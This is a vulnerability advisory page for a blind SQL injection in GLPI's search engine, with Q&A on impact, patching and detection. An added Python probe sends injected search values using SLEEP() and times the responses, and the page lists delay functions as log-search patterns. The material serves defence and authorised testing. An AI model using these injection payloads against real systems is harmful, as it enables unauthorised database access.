CVE-2026-26263
Blind SQL Injection in GLPI Search Engine Allows Data Exposure
Publication date: 2026-04-06
Last updated on: 2026-04-07
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| glpi-project | glpi | From 11.0.0 (inc) to 11.0.6 (exc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-26263 is a high-severity, unauthenticated, time-based blind SQL injection in the Search engine component of GLPI, an open-source IT asset management application.
It affects GLPI versions from 11.0.0 up to, but not including, 11.0.6, and lets an attacker inject SQL into a query that the application runs before any login. Because the injection is blind, no query output is returned directly; the attacker instead pairs injected conditions with a database delay (for example MySQL's SLEEP()) and reads the answer from how long the response takes, extracting data one inference at a time.
The root cause is the CWE-89 pattern listed above: the search engine builds SQL from user-supplied input without neutralising SQL syntax, so crafted input changes the query the backend database executes.
How can this vulnerability impact me?
The vulnerability is rated as having a high impact on the confidentiality, integrity, and availability of the affected GLPI instance.
- Confidentiality: an unauthenticated attacker can read data from the GLPI database, including asset, user, and ticket records, by inferring it through response timing.
- Integrity: depending on what the injected SQL can reach, an attacker may be able to modify or corrupt stored data.
- Availability: the delay primitive itself (many concurrent SLEEP() requests) or destructive queries can tie up database connections and disrupt service.
Because neither authentication nor user interaction is required, anyone who can reach the GLPI web interface over the network can attempt exploitation, which raises the risk for internet-exposed instances in particular.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to upgrade GLPI to version 11.0.6 or later, where this vulnerability is fixed.
As a workaround before upgrading, you can disable anonymous access to the FAQ, which limits exploitation to authenticated users only.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
Because the flaw lets an unauthenticated attacker run injected SQL against the GLPI database, a successful exploit can expose or alter the personal and asset data GLPI holds.
Unauthorised access to such data is the kind of incident that regulations such as GDPR and HIPAA require organisations to prevent, detect, and in many cases report.
If exploited, the vulnerability could therefore put an organisation out of compliance with those standards, through disclosure of regulated data or disruption of a system that processes it.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The vulnerability is a time-based blind SQL injection in the Search engine component of GLPI versions 11.0.0 up to but not including 11.0.6. Active detection involves sending crafted search requests that carry SQL payloads and measuring the response time, since a blind injection produces no visible output.
The standard probe injects a conditional database delay, for example SLEEP(5) on MySQL/MariaDB, and compares the response time against a control request that uses identical syntax with SLEEP(0). A difference that tracks the requested delay, repeated over several samples to rule out network jitter or a genuinely slow search, indicates that the database is evaluating the injected expression. Only probe systems you are authorised to test, and keep the delay small, because every positive probe ties up a database connection for that long.
The available resources do not publish a specific request or tool command for this CVE. General-purpose scanners such as sqlmap can test the GLPI search request for time-based blind injection once you supply the endpoint and the parameter under test. For passive detection, search web server access logs and any reverse-proxy logs for search parameters containing SLEEP(, BENCHMARK(, or similar delay functions, and check the database slow-query log for search queries that completed in suspiciously round multiples of seconds.
Mitigation is to upgrade GLPI to version 11.0.6 or later. As a temporary workaround, disabling anonymous access to the FAQ limits exploitation to authenticated users only.
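The differential timing probe described above, written out as an added example (not GLPI project code and not from the advisory). The endpoint and parameter names are placeholders, because the advisory does not publish the exact vulnerable request; the string-context quoting in the payload is likewise an assumption. A constructed in-process backend stands in for the target so the example runs offline and shows both a vulnerable and a patched outcome. Use it only against systems you are authorised to test.

```python
"""Timing-differential probe for time-based blind SQL injection.

Added example, not GLPI project code. Only run against systems you are
authorised to test.
"""
import re
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# Assumptions, not from the advisory: the exact GLPI search request is not
# published here, so the endpoint and parameter below are placeholders.
TARGET_URL = "https://glpi.example/<search-endpoint>"
SEARCH_PARAM = "<search-param>"

# A sender submits one search value; the harness only measures how long it takes.
Sender = Callable[[str], None]


def http_sender(url: str = TARGET_URL, param: str = SEARCH_PARAM,
                timeout: float = 30.0) -> Sender:
    """Real sender: GET with the search value in the query string."""
    def send(value: str) -> None:
        query = urllib.parse.urlencode({param: value})
        try:
            urllib.request.urlopen(f"{url}?{query}", timeout=timeout).read()
        except urllib.error.URLError:
            pass  # an error page still yields a timing sample
    return send


def simulated_sender(vulnerable: bool) -> Sender:
    """Constructed stand-in for a backend so the example runs offline.

    When `vulnerable`, any SLEEP(n) in the input is honoured, mimicking a
    database that evaluates the injected expression; otherwise it is ignored.
    """
    def send(value: str) -> None:
        match = re.search(r"SLEEP\((\d+)\)", value)
        if vulnerable and match:
            time.sleep(int(match.group(1)))
    return send


def median_time(send: Sender, value: str, samples: int) -> float:
    """Median of several timings; the median resists a single slow outlier."""
    def one() -> float:
        start = time.perf_counter()
        send(value)
        return time.perf_counter() - start
    return statistics.median(one() for _ in range(samples))


def probe_time_based_sqli(send: Sender, delay: int = 5, samples: int = 3,
                          min_fraction: float = 0.8) -> dict:
    """Compare a SLEEP(0) control against SLEEP(delay).

    Both requests carry identical injected syntax; only the sleep argument
    differs, so a time difference that tracks `delay` is attributable to the
    database evaluating our input rather than to network jitter or a slow
    search. The string-context quoting is an assumption about the query.
    """
    control = "printer' AND SLEEP(0) AND 'a'='a"
    probe = f"printer' AND SLEEP({delay}) AND 'a'='a"
    t_control = median_time(send, control, samples)
    t_probe = median_time(send, probe, samples)
    observed = t_probe - t_control
    return {
        "control_s": round(t_control, 3),
        "probe_s": round(t_probe, 3),
        "observed_delay_s": round(observed, 3),
        "likely_vulnerable": observed >= min_fraction * delay,
    }


if __name__ == "__main__":
    # Offline demo against the constructed backends; delay=1 keeps it short.
    for label, vuln in (("vulnerable", True), ("patched", False)):
        result = probe_time_based_sqli(simulated_sender(vuln), delay=1, samples=1)
        print(label, result)
```

Against a live target, swap `simulated_sender(...)` for `http_sender()` with the real URL and parameter, keep `delay` at a few seconds, and raise `samples` to three or more; a single positive sample is not evidence on a busy server.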